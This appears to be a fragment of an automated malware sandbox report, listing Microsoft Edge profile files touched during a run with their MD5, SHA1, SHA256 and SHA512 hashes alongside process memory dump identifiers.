C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 328ee31b165595662abc64b159d27b28 |
| SHA1 | 1940a93a49af027f63e4d27f214ed87f6dc6ccfe |
| SHA256 | c3f1d1bbb88c86a8dd125c96fdf2898d915c1db4e6bb7a29b786609ebb857dd9 |
| SHA512 | 8553208cad50a9bede2498cd7919be5401dcb5444301a706f518f6d6874c6fdea5a4c9ad7c6e920cacd83b347ae5f57f61b25773f14d55b03127147a41d4c565 |
memory/5208-954-0x0000000000400000-0x0000000000D1B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8c1c6f6e444448ec2e9b94b685efc009 |
| SHA1 | d217cc31841cffe3a23577f3f9e8a6f4f160fdfa |
| SHA256 | 1567dbceccdcedf09437b6c7add49c8d8bec8d0714336c81749314864893b31c |
| SHA512 | f7e4f6ec2d9b8d606b36eb66065dfc0233bc1627c932d394e879b9e823008f62e29b72e8009d246360928b073947c4ceebd2dc4a892186214873434fd9072d38 |
memory/4936-987-0x00007FF709D60000-0x00007FF70A301000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | f9ab57047007b5a737d910688d40cefa |
| SHA1 | 70e42aeb82d0796a874ec49a6e2fec9fcdf6fe90 |
| SHA256 | 90fc4ebb2132b0501a2e9b762ceeca86824dcf2ef0daa64527ea90ac0d498231 |
| SHA512 | b7afbaa031edd3fd060e04beb22041ba17f3aa9debbe947685eeba95fa7122f8dfcf39b150188419f6eb7c028313aaa78e19a04710d2eeeeb7ddb08b5688eca4 |
memory/5208-1033-0x0000000000400000-0x0000000000D1B000-memory.dmp